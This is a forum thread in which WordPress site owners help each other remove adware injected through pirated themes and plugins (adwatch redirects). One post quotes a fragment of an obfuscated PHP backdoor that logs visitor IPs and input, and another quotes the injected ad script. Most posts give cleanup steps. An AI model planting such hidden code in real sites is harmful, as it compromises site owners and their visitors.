Best Blackhat Forum

Full Version: Beware before downloading wordpress themes and plugins [adwatch]
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4 5 6 7
I have the same problem with my website. Was not able to find any solution, but I found something weird.
A file called post.php with this in it:

0) print "\x53T\x41TUS\x2d\x49\x4dP\x4f\x52T-\x4fK"; if (strlen($input) > 10) { $fp = @fopen(str_replace("\x2ep\x68\x70",".\x62\x69\x6e",basename($_SERVER["SC\x52\x49P\x54_FIL\x45\x4eAM\x45"])), "a"); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER["\x52\x45\x4dOTE\x5f\x41DDR"]."\t".base64_encode($input)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } elseif (strpos($_SERVER["\x52\x45Q\x55\x45\x53T\x5f\x55R\x49"], "\x2es\x68\x74\x6dl") !== false) { print $_SERVER["\x52\x45Q\x55\x45\x53T\x5f\x55R\x49"]; } exit; ?>

Could it be related? I deleted the file multiple times and it keeps re-appearing.
(03-20-2014 02:23 PM) Wrote: [ -> ]I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
and causing redirect at random time intervals from all my links on website.

open functions.php and remove this line: include 'inc/settings_class.php';

also remove the file at that location.

The jerk doing this uses an include function to the infected file. Its pretty easy to spot since its at the very top of functions.php or in the case of mymail plugin include 'classes/wc.class.php'; right at the top of mymail.php
(03-20-2014 03:19 PM)r1ckd33zy Wrote: [ -> ]
(03-20-2014 11:56 AM)adwatch Wrote: [ -> ]Hello to everyone at bestblackhatforum, my name is James and I am head of technical support over at

We have gone ahead and banned user: 234224

If these links are still causing you trouble please PM me your domain in question and I will add it to our domain block list.

Alternatively you can contact us here: 24 hours a day 7 days a week.

thank you and stay safe.
This is a most amazing act of 'customer support' i have seen in a while. Who would have thought that someone for would be involved in supporting members of a 'blackhat' forum...
Haha We are a fairly new company and want to keep our name clean. We figure if we work with publishers whether it be blackhat or whitehat we can work together. Plus we have some really good fraud checks which none of our competitors have.

(03-20-2014 03:43 PM)imxa Wrote: [ -> ]
(03-20-2014 03:19 PM)r1ckd33zy Wrote: [ -> ]
(03-20-2014 11:56 AM)adwatch Wrote: [ -> ]Hello to everyone at bestblackhatforum, my name is James and I am head of technical support over at

We have gone ahead and banned user: 234224

If these links are still causing you trouble please PM me your domain in question and I will add it to our domain block list.

Alternatively you can contact us here: 24 hours a day 7 days a week.

thank you and stay safe.
This is a most amazing act of 'customer support' i have seen in a while. Who would have thought that someone for would be involved in supporting members of a 'blackhat' forum...

Is it safe give the link of our sites? I mean, he can be a guy who collect sensitive data of our websites with this CR$%P script and he need our site link to take control of it. Im a paranoid, but this advertising company dont make me feel safe at all. I hope he is from a real technical support.
You don't need to PM your website if your worried. You're welcome to contact us here:
(03-20-2014 06:08 PM)bale Wrote: [ -> ]
(03-20-2014 02:23 PM) Wrote: [ -> ]I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
and causing redirect at random time intervals from all my links on website.

open functions.php and remove this line: include 'inc/settings_class.php';

also remove the file at that location.

The jerk doing this uses an include function to the infected file. Its pretty easy to spot since its at the very top of functions.php or in the case of mymail plugin include 'classes/wc.class.php'; right at the top of mymail.php
Where is this file ''functions.php'' located as I can't find it in my blog location?
Follow these steps

Login to you wp-admin and then go to your site
click view source
now ctrl+f and search body {visibility:hidden;}
this code confirms adwatch is inserted in your theme or plugins.

this code is implemented before</head> tag

if you access on same browser where you login as admin you will find this source code on your home page
body {visibility:hidden;}</style>

now go to exploit-scanner plugin then chek that
Search for suspicious styles option
click start scan
after some time it will reload
now again ctrl+f search " body {visibility:hidden;}
and check which file is affected and then uninstall that theme or plugin or delete that code on that file
Yes this happened to me a few years ago. I downloaded a theme and installed it, then I began getting the message this site has been hacked. I removed the theme, deleted the sub-domain it was under. Then I checked each .js file and looked for the word "var" and sure enough I found a re-direct link.

Not every var text is bad just look for things like:
var adwatch
var iframe
var exclude
var adwatch _advert

and so on...
Good hunting.
Hi already try to search adwat on all source files of wordpress and nothing is found. The strange thing is that this is still hapenning after i bought the theme replace all files and the problem still happens. I´m suspecting that the malware must be on the database or on other place than the theme files.
But i cant find it anyware.
(03-20-2014 06:08 PM)bale Wrote: [ -> ]
(03-20-2014 02:23 PM) Wrote: [ -> ]I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
and causing redirect at random time intervals from all my links on website.

open functions.php and remove this line: include 'inc/settings_class.php';

also remove the file at that location.

The jerk doing this uses an include function to the infected file. Its pretty easy to spot since its at the very top of functions.php or in the case of mymail plugin include 'classes/wc.class.php'; right at the top of mymail.php
Go for this solution its worked....
Thanks to adwatch, the adds until now are gone, but i cant find the find the script yet, the recomendations

"bale Wrote:
(Today 04:23 AM) Wrote:
I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
and causing redirect at random time intervals from all my links on website.

open functions.php and remove this line: include 'inc/settings_class.php';

also remove the file at that location.

The jerk doing this uses an include function to the infected file. Its pretty easy to spot since its at the very top of functions.php or in the case of mymail plugin include 'classes/wc.class.php'; right at the top of mymail.php
Go for this solution its worked....

Read more @ : Beware before downloading wordpress themes and plugins [adwatch] "

Didnt work for me because i dont have that string in my functions file, but thanks anyway
I'd like to thank everyone for sharing their contributions to this thread b/c I also ran across this problem w/ a plugin that I installed (EventON).
After spending countless hours going over every line of code with a colleague, it finally dawned on me to look @ the code that "bale" suggested was the problem.

My file was hidden away in "classes/class-settings.php" and called by include 'classes/class-settings.php'; in my eventon.php file.

The key is to do a search (I used the Multi-File Search in TextWrangler of my entire site --- downloaded locally to my machine) for the following string: spamcheckr

The "infected" file (class-settings.php) has a ton of commented out lines of code, but it really only does one thing which is to pull the URL "". Just bringing that URL up in your browser will show a blank page. But if you view the source, you will see the following code:

<script type="text/javascript">
    var adwatch_id = 234224;    var adwatch_advert = "int";    var exclude_domains = ['wp-admin', 'wp-login', '', '', '', '', '', '', ''];</script><script type="text/javascript" src=""></script>

As "bale" suggested, just delete the include from your file and delete that class-settings.php and you should be good to go.
Hope this helps.
Pages: 1 2 3 4 5 6 7
Reference URL's